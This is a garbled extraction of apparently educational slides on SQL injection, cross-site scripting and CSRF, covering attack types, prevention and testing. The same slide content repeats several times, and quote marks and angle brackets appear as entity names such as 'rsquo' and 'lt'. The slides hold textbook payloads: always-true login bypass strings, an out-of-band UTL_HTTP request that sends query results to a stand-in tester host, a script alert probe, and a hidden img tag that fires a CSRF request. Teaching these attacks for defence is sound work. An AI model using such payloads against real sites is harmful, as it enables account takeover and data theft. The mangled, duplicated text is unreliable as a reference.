$password = 1rsquo or lsquo1rsquo = lsquo1
Then query becomes
SELECT FROM Users WHERE Username=rsquo1rsquo OR lsquo1rsquo = lsquo1rsquo AND
Password=rsquo1rsquo OR lsquo1rsquo = lsquo1rsquo
bull SELECT FROM Users WHERE ((Username=rsquo$usernamersquo) AND
(Password=MD5(lsquo$passwordrsquo)))
$username = 1rsquo or lsquo1rsquo = lsquo1rsquo))
$password = foo
Then query becomes
SELECT FROM Users WHERE ((Username=lsquo1rsquo or lsquo1rsquo=lsquo1rsquo))rsquo) AND
(Password=MD5(lsquofoorsquo)))
All the columns of Users table will be returned on execution of above query
Types of SQL Injection attacks
bull In band
By injecting SQL code data retrieved is directly displayed in web application
page in this type of attack
SELECT FROM WHERE USERNAME=lsquoVENKATrsquo
bull Out of Band
Data is retrieved in a different way (Like results are sent in an email to
attacker) in this type of attack
UTL_HTTPREQUEST can be used to send the SQL query results to a
remote IP address
Request for Out of band attack can be like
bull httpwwwexamplecomproductphpid=10||UTL_HTTPrequest(lsquotesterse
rvercom80rsquo)
bull Inferential Or Blind
1 Data is not retrieved in this type of attack
2 Requests are submitted and DB server responses are observed to reconstruct
query
3 These kind of Blind attacks are used when the data is not returned by server
and a generic error message is displayed
Prevention of SQL Injection
bull Assume all user-submitted data is evil and validate everything
bull Ensure that application users have the least privileges
bull Install patches and updates as soon as possible
bull Display Generic error message instead of printing stack trace
bull Using Stored procedures and not exposing the sensitive details
How to test for SQL Injection
bull Analyze the areas where application talks to Database server
bull Input data using a data fuzzer or predefined list of data
bull Monitor the responses from server
bull If application prints stack trace in the error modify the Query and try
again
bull If the application returns generic error look out for error message in page
source code
bull In case of no information from application use Blind injection attack
technique
Cross Site Scripting
bull XSS is short form of Cross site scripting
bull XSS helps attacker to attack users of a site by injecting a script into
webpage
bull Script gets executed when any user visits the page
bull It does not attack Web application server or Database
bull It breaks the trust User has for the Web application
Key players in XSS
bull Browser
bull External Sources
Browser
1 Browser receives information from server which can be classified as data
and instructions
2 It displays data as normal plain text
3 It executed instructions within instruction context
4 It also executes instructions which are part of data
For example Consider that delivery instructions for a product are entered as
This is a ltscriptgtalert(1)ltscriptgt Test order
Default Browser behavior
User requests a site
Server responds with HTML
CSS Javascript etc files
Browser displays the
content given by site
External Source
bull If an Application does not validate user input properly user input along
with malicious script gets into application
bull Browser executes the script which is part of input when it receives the data
from server in the form of response
Possible Sources of User input
1 Browsers receive information from External sources and Server
2 Form inputs
3 Reviews or Comments
4 Query string parameter values
So improper handling of input data coming from external source is a cause of
Cross site scripting
Sample Scenario
Server
User 1 User 2
User 1 posting comment
which contains ltscriptgt
tags
User 2 views comments
page and Browser
executes script
User 1 steals User 2 data
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
General Application Behavior
Examples
bull SELECT FROM Users WHERE UserId = 105 or 1=1
As 1=1 is always true all the rows from table Users will be returned
This happens when proper sanitization is not applied to UserId input field
bull SELECT FROM Users WHERE Username=rsquo$usernamersquo AND
Password=rsquo$passwordrsquo
$username = 1rsquo or lsquo1rsquo = lsquo1
$password = 1rsquo or lsquo1rsquo = lsquo1
Then query becomes
SELECT FROM Users WHERE Username=rsquo1rsquo OR lsquo1rsquo = lsquo1rsquo AND
Password=rsquo1rsquo OR lsquo1rsquo = lsquo1rsquo
bull SELECT FROM Users WHERE ((Username=rsquo$usernamersquo) AND
(Password=MD5(lsquo$passwordrsquo)))
$username = 1rsquo or lsquo1rsquo = lsquo1rsquo))
$password = foo
Then query becomes
SELECT FROM Users WHERE ((Username=lsquo1rsquo or lsquo1rsquo=lsquo1rsquo))rsquo) AND
(Password=MD5(lsquofoorsquo)))
All the columns of Users table will be returned on execution of above query
Types of SQL Injection attacks
bull In band
By injecting SQL code data retrieved is directly displayed in web application
page in this type of attack
SELECT FROM WHERE USERNAME=lsquoVENKATrsquo
bull Out of Band
Data is retrieved in a different way (Like results are sent in an email to
attacker) in this type of attack
UTL_HTTPREQUEST can be used to send the SQL query results to a
remote IP address
Request for Out of band attack can be like
bull httpwwwexamplecomproductphpid=10||UTL_HTTPrequest(lsquotesterse
rvercom80rsquo)
bull Inferential Or Blind
1 Data is not retrieved in this type of attack
2 Requests are submitted and DB server responses are observed to reconstruct
query
3 These kind of Blind attacks are used when the data is not returned by server
and a generic error message is displayed
Prevention of SQL Injection
bull Assume all user-submitted data is evil and validate everything
bull Ensure that application users have the least privileges
bull Install patches and updates as soon as possible
bull Display Generic error message instead of printing stack trace
bull Using Stored procedures and not exposing the sensitive details
How to test for SQL Injection
bull Analyze the areas where application talks to Database server
bull Input data using a data fuzzer or predefined list of data
bull Monitor the responses from server
bull If application prints stack trace in the error modify the Query and try
again
bull If the application returns generic error look out for error message in page
source code
bull In case of no information from application use Blind injection attack
technique
Cross Site Scripting
bull XSS is short form of Cross site scripting
bull XSS helps attacker to attack users of a site by injecting a script into
webpage
bull Script gets executed when any user visits the page
bull It does not attack Web application server or Database
bull It breaks the trust User has for the Web application
Key players in XSS
bull Browser
bull External Sources
Browser
1 Browser receives information from server which can be classified as data
and instructions
2 It displays data as normal plain text
3 It executed instructions within instruction context
4 It also executes instructions which are part of data
For example Consider that delivery instructions for a product are entered as
This is a ltscriptgtalert(1)ltscriptgt Test order
Default Browser behavior
User requests a site
Server responds with HTML
CSS Javascript etc files
Browser displays the
content given by site
External Source
bull If an Application does not validate user input properly user input along
with malicious script gets into application
bull Browser executes the script which is part of input when it receives the data
from server in the form of response
Possible Sources of User input
1 Browsers receive information from External sources and Server
2 Form inputs
3 Reviews or Comments
4 Query string parameter values
So improper handling of input data coming from external source is a cause of
Cross site scripting
Sample Scenario
Server
User 1 User 2
User 1 posting comment
which contains ltscriptgt
tags
User 2 views comments
page and Browser
executes script
User 1 steals User 2 data
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Examples
bull SELECT FROM Users WHERE UserId = 105 or 1=1
As 1=1 is always true all the rows from table Users will be returned
This happens when proper sanitization is not applied to UserId input field
bull SELECT FROM Users WHERE Username=rsquo$usernamersquo AND
Password=rsquo$passwordrsquo
$username = 1rsquo or lsquo1rsquo = lsquo1
$password = 1rsquo or lsquo1rsquo = lsquo1
Then query becomes
SELECT FROM Users WHERE Username=rsquo1rsquo OR lsquo1rsquo = lsquo1rsquo AND
Password=rsquo1rsquo OR lsquo1rsquo = lsquo1rsquo
bull SELECT FROM Users WHERE ((Username=rsquo$usernamersquo) AND
(Password=MD5(lsquo$passwordrsquo)))
$username = 1rsquo or lsquo1rsquo = lsquo1rsquo))
$password = foo
Then query becomes
SELECT FROM Users WHERE ((Username=lsquo1rsquo or lsquo1rsquo=lsquo1rsquo))rsquo) AND
(Password=MD5(lsquofoorsquo)))
All the columns of Users table will be returned on execution of above query
Types of SQL Injection attacks
bull In band
By injecting SQL code data retrieved is directly displayed in web application
page in this type of attack
SELECT FROM WHERE USERNAME=lsquoVENKATrsquo
bull Out of Band
Data is retrieved in a different way (Like results are sent in an email to
attacker) in this type of attack
UTL_HTTPREQUEST can be used to send the SQL query results to a
remote IP address
Request for Out of band attack can be like
bull httpwwwexamplecomproductphpid=10||UTL_HTTPrequest(lsquotesterse
rvercom80rsquo)
bull Inferential Or Blind
1 Data is not retrieved in this type of attack
2 Requests are submitted and DB server responses are observed to reconstruct
query
3 These kind of Blind attacks are used when the data is not returned by server
and a generic error message is displayed
Prevention of SQL Injection
bull Assume all user-submitted data is evil and validate everything
bull Ensure that application users have the least privileges
bull Install patches and updates as soon as possible
bull Display Generic error message instead of printing stack trace
bull Using Stored procedures and not exposing the sensitive details
How to test for SQL Injection
bull Analyze the areas where application talks to Database server
bull Input data using a data fuzzer or predefined list of data
bull Monitor the responses from server
bull If application prints stack trace in the error modify the Query and try
again
bull If the application returns generic error look out for error message in page
source code
bull In case of no information from application use Blind injection attack
technique
Cross Site Scripting
bull XSS is short form of Cross site scripting
bull XSS helps attacker to attack users of a site by injecting a script into
webpage
bull Script gets executed when any user visits the page
bull It does not attack Web application server or Database
bull It breaks the trust User has for the Web application
Key players in XSS
bull Browser
bull External Sources
Browser
1 Browser receives information from server which can be classified as data
and instructions
2 It displays data as normal plain text
3 It executed instructions within instruction context
4 It also executes instructions which are part of data
For example Consider that delivery instructions for a product are entered as
This is a ltscriptgtalert(1)ltscriptgt Test order
Default Browser behavior
User requests a site
Server responds with HTML
CSS Javascript etc files
Browser displays the
content given by site
External Source
bull If an Application does not validate user input properly user input along
with malicious script gets into application
bull Browser executes the script which is part of input when it receives the data
from server in the form of response
Possible Sources of User input
1 Browsers receive information from External sources and Server
2 Form inputs
3 Reviews or Comments
4 Query string parameter values
So improper handling of input data coming from external source is a cause of
Cross site scripting
Sample Scenario
Server
User 1 User 2
User 1 posting comment
which contains ltscriptgt
tags
User 2 views comments
page and Browser
executes script
User 1 steals User 2 data
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
bull SELECT FROM Users WHERE ((Username=rsquo$usernamersquo) AND
(Password=MD5(lsquo$passwordrsquo)))
$username = 1rsquo or lsquo1rsquo = lsquo1rsquo))
$password = foo
Then query becomes
SELECT FROM Users WHERE ((Username=lsquo1rsquo or lsquo1rsquo=lsquo1rsquo))rsquo) AND
(Password=MD5(lsquofoorsquo)))
All the columns of Users table will be returned on execution of above query
Types of SQL Injection attacks
bull In band
By injecting SQL code data retrieved is directly displayed in web application
page in this type of attack
SELECT FROM WHERE USERNAME=lsquoVENKATrsquo
bull Out of Band
Data is retrieved in a different way (Like results are sent in an email to
attacker) in this type of attack
UTL_HTTPREQUEST can be used to send the SQL query results to a
remote IP address
Request for Out of band attack can be like
bull httpwwwexamplecomproductphpid=10||UTL_HTTPrequest(lsquotesterse
rvercom80rsquo)
bull Inferential Or Blind
1 Data is not retrieved in this type of attack
2 Requests are submitted and DB server responses are observed to reconstruct
query
3 These kind of Blind attacks are used when the data is not returned by server
and a generic error message is displayed
Prevention of SQL Injection
bull Assume all user-submitted data is evil and validate everything
bull Ensure that application users have the least privileges
bull Install patches and updates as soon as possible
bull Display Generic error message instead of printing stack trace
bull Using Stored procedures and not exposing the sensitive details
How to test for SQL Injection
bull Analyze the areas where application talks to Database server
bull Input data using a data fuzzer or predefined list of data
bull Monitor the responses from server
bull If application prints stack trace in the error modify the Query and try
again
bull If the application returns generic error look out for error message in page
source code
bull In case of no information from application use Blind injection attack
technique
Cross Site Scripting
bull XSS is short form of Cross site scripting
bull XSS helps attacker to attack users of a site by injecting a script into
webpage
bull Script gets executed when any user visits the page
bull It does not attack Web application server or Database
bull It breaks the trust User has for the Web application
Key players in XSS
bull Browser
bull External Sources
Browser
1 Browser receives information from server which can be classified as data
and instructions
2 It displays data as normal plain text
3 It executed instructions within instruction context
4 It also executes instructions which are part of data
For example Consider that delivery instructions for a product are entered as
This is a ltscriptgtalert(1)ltscriptgt Test order
Default Browser behavior
User requests a site
Server responds with HTML
CSS Javascript etc files
Browser displays the
content given by site
External Source
bull If an Application does not validate user input properly user input along
with malicious script gets into application
bull Browser executes the script which is part of input when it receives the data
from server in the form of response
Possible Sources of User input
1 Browsers receive information from External sources and Server
2 Form inputs
3 Reviews or Comments
4 Query string parameter values
So improper handling of input data coming from external source is a cause of
Cross site scripting
Sample Scenario
Server
User 1 User 2
User 1 posting comment
which contains ltscriptgt
tags
User 2 views comments
page and Browser
executes script
User 1 steals User 2 data
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
bull Build an HTML page which contains a http request referencing URL u
bull Make sure user is logged into application
bull Induce him into following the link pointing the URL to be tested
bull Check if the web server is executing the request
Preventing CSRF attacks
bull Including CSRF tokens for each user session
bull Submission of double cookies
bull Log out from the sensitive applications when the work is done
bull Do not save any login credentials on the browser
bull Using secure browser extensions
Queries
REFERENCES
bull Owasp Testing Guide
httpswwwowasporgimages552OWASP_Testing_Guide_v4pdf
bull Veracodecom
httpwwwveracodecomsecuritysql-injection
bull Code Project
httpwwwcodeprojectcomArticles877794Preventing-XSS-in-ASP-NET-
Made-Easy
Types of SQL Injection attacks
bull In band
By injecting SQL code data retrieved is directly displayed in web application
page in this type of attack
SELECT FROM WHERE USERNAME=lsquoVENKATrsquo
bull Out of Band
Data is retrieved in a different way (Like results are sent in an email to
attacker) in this type of attack
UTL_HTTPREQUEST can be used to send the SQL query results to a
remote IP address
Request for Out of band attack can be like
bull httpwwwexamplecomproductphpid=10||UTL_HTTPrequest(lsquotesterse
rvercom80rsquo)
bull Inferential Or Blind
1 Data is not retrieved in this type of attack
2 Requests are submitted and DB server responses are observed to reconstruct
query
3 These kind of Blind attacks are used when the data is not returned by server
and a generic error message is displayed
Prevention of SQL Injection
bull Assume all user-submitted data is evil and validate everything
bull Ensure that application users have the least privileges
bull Install patches and updates as soon as possible
bull Display Generic error message instead of printing stack trace
bull Using Stored procedures and not exposing the sensitive details
How to test for SQL Injection
bull Analyze the areas where application talks to Database server
bull Input data using a data fuzzer or predefined list of data
bull Monitor the responses from server
bull If application prints stack trace in the error modify the Query and try
again
bull If the application returns generic error look out for error message in page
source code
bull In case of no information from application use Blind injection attack
technique
Cross Site Scripting
bull XSS is short form of Cross site scripting
bull XSS helps attacker to attack users of a site by injecting a script into
webpage
bull Script gets executed when any user visits the page
bull It does not attack Web application server or Database
bull It breaks the trust User has for the Web application
Key players in XSS
bull Browser
bull External Sources
Browser
1 Browser receives information from server which can be classified as data
and instructions
2 It displays data as normal plain text
3 It executed instructions within instruction context
4 It also executes instructions which are part of data
For example Consider that delivery instructions for a product are entered as
This is a ltscriptgtalert(1)ltscriptgt Test order
Default Browser behavior
User requests a site
Server responds with HTML
CSS Javascript etc files
Browser displays the
content given by site
External Source
bull If an Application does not validate user input properly user input along
with malicious script gets into application
bull Browser executes the script which is part of input when it receives the data
from server in the form of response
Possible Sources of User input
1 Browsers receive information from External sources and Server
2 Form inputs
3 Reviews or Comments
4 Query string parameter values
So improper handling of input data coming from external source is a cause of
Cross site scripting
Sample Scenario
Server
User 1 User 2
User 1 posting comment
which contains ltscriptgt
tags
User 2 views comments
page and Browser
executes script
User 1 steals User 2 data
What can be done by using Cross site scripting
bull Stealing User cookies
bull Stealing confidential information
bull Malicious redirects
gtgtRedirecting to attacker site and asking for login credentials
bull Social engineering
gtgtInjecting new HTML code and asking for Personal information Credit
card details etc
bull Performing Clipboard Theft
Types of Cross Site Scripting
bull Persistent XSS
Injected Script into an input field is stored in web server (database file etc)
and same data is displayed to other users
bull Reflected XSS
Injected script is not stored in server but sent to browser directly for display
purpose and browser executes the script on user browser
bull DOM XSS
Injected script uses DOM data to display section of webpage and other actions
of attacker intention It does not require server side interaction
Example documentURL windowname etc
Preventing XSS
bull Filtering data
If user provides ltscriptgtalert(1)ltscriptgt then after filtering it becomes
alert(1) So the browser simply displays the text and will not execute any
instruction
bull Encoding data
1 If user provides ltscriptgtalert(1)ltscriptgt then after encoding it
becomes ampltscriptampgtalert(1)ampltscriptampgt
2 When the encoded data is sent to browser it will be displayed as
ltscriptgtalert(1)ltscriptgt instead of getting executed as script
Few other methods are used for Preventing XSS hellip
How to Test for XSS vulnerability
1 Identify all input fields like HTTP parameters POST data hidden form
field values and predefined radio or selection values
2 Input specially crafted input data into input fields
3 Analyze the resulting HTML response and search for input data
4 Find the characters which are not properly encoded or filtered out
Tools like ZAP can be used for performing Cross Site Scripting testing in our
web applications
Cross Site Request Forgery
What is CSRF
bull CSRF attack forces end user to execute unwanted actions on a web application in which the user is authenticated currently
bull For example this attack could result in a transfer of funds changing a password or purchasing an item in the users context
bull In effect CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer form submission etc) via the targets browser without knowledge of the target user at least until the unauthorized function has been committed
Sample Scenario
httpwwwgmailcomdeleteAllMessages
Session ID
bull Consider that Gmail relies only on information known to browser
bull For an authenticated user browser will automatically send cookie with
subsequent requests
bull Request in figure can be generated in three ways
1 By the user
2 By the user typing url directly
3 By the user following external link
Victim Site
Why does CSRF usually happen
bull Web browser handling of session information such as cookies and http
authentication information
bull Attacker possessing knowledge of valid web application URLrsquos
For example httpswwwexamplecommyaccountcreditcards
bull Application relying entirely on information which is known by the browser
bull Existence of HTML tags whose presence causes access to the application
resources such as ltimggt tag
For example
ltimg src=httpswwwexamplecomdeleteProduct width=ldquo0rdquo height=ldquo0rdquo gt
How does user involve in CSRF attacks
bull Following the link in an anonymous email or via chat group
Server responds to the request because User session information is
automatically sent by browser with the request
bull When user follows a link which refers to a page containing following
HTML
lthtmlgtltbodygt
ltimg src=ldquohttpwwwexamplecomactionrdquo gt
ltbodygtlthtmlgt
Facts about CSRF
bull Customers of a bank in Mexico were attacked with an email with img tag
The link in img tag changed DNS entry for bank in their routers and
pointed to a malicious website impersonating the bank
bull About 18 million users of EBay lsquos internet auction in Korea lost their
personal information
bull CSRF is ranked as 8th vulnerability in OWASP Top ten vulnerabilities list
How to Test for CSRF weakness in a web application
bull Consider a URL u=httpwwwexamplecomaction
